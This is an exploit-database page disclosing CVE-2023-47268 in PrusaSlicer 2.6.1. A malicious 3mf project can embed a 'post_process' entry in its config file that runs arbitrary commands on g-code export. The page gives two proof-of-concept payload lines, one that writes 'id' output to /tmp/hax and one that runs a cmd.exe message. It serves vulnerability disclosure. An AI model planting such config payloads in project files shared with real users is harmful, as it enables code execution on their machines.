Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
PrusaSlicer 2.6.1 - Arbitrary Code Execution on G-Code Export - exploit.company
header-logo
Suggest Exploit
vendor:
PrusaSlicer
by:
Kamil Breński
6.1
CVSS
HIGH
Arbitrary Code Execution
94
CWE
Product Name: PrusaSlicer
Affected Version From: PrusaSlicer up to and including version 2.6.1
Affected Version To: PrusaSlicer up to and including version 2.6.1
Patch Exists: NO
Related CWE: CVE-2023-47268
CPE: a:prusa3d:prusaslicer:2.6.1
Metasploit:
Other Scripts:
Platforms Tested: Windows, Linux
2024

PrusaSlicer 2.6.1 – Arbitrary Code Execution on G-Code Export

PrusaSlicer up to and including version 2.6.1 is vulnerable to arbitrary code execution when exporting g-code from a malicious 3mf project. By manipulating the 'Metadata/Slic3r_PE.config' file within the project, an attacker can insert a post-processing script that executes arbitrary code upon g-code export. This exploit has been demonstrated on both Windows and Linux platforms.

Mitigation:

Ensure to validate and sanitize input data to prevent unauthorized code execution. Regularly update PrusaSlicer to the latest version to mitigate this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: PrusaSlicer 2.6.1 - Arbitrary code execution on g-code export
# Date: 16/01/2024
# Exploit Author: Kamil Breński
# Vendor Homepage: https://www.prusa3d.com
# Software Link: https://github.com/prusa3d/PrusaSlicer
# Version: PrusaSlicer up to and including version 2.6.1
# Tested on: Windows and Linux
# CVE: CVE-2023-47268

==========================================================================================
1.) 3mf Metadata extension
==========================================================================================

PrusaSlicer 3mf project (zip) archives contain the 'Metadata/Slic3r_PE.config' file which describe various project settings, this is an extension to the regular 3mf file. PrusaSlicer parses this additional file to read various project settings. One of the settings (post_process) is the post-processing script (https://help.prusa3d.com/article/post-processing-scripts_283913) this feature has great potential for abuse as it allows a malicious user to create an evil 3mf project that will execute arbitrary code when the targeted user exports g-code from the malicious project. A project file needs to be modified with a prost process script setting in order to execute arbitrary code, this is demonstrated on both a Windows and Linux host in the following way.

==========================================================================================
2.) PoC
==========================================================================================

For the linux PoC, this CLI command is enough to execute the payload contained in the project. './prusa-slicer -s code-exec-linux.3mf'. After slicing, a new file '/tmp/hax' will be created. This particular PoC contains this 'post_process' entry in the 'Slic3r_PE.config' file:

```
; post_process = "/usr/bin/id > /tmp/hax #\necho 'Here I am, executing arbitrary code on this host. Thanks for slicing (x_x)'>> /tmp/hax #"
```

Just slicing the 3mf using the `-s` flag is enough to start executing potentially malicious code.

For the windows PoC with GUI, the malicious 3mf file needs to be opened as a project file (or the settings imported). After exporting, a pop-up executed by the payload will appear. The windows PoC contains this entry:

```
; post_process = "C:\\Windows\\System32\\cmd.exe /c msg %username% Here I am, executing arbitrary code on this host. Thanks for slicing (x_x) "
```

Navigation

Suggest Exploit

Services By CQR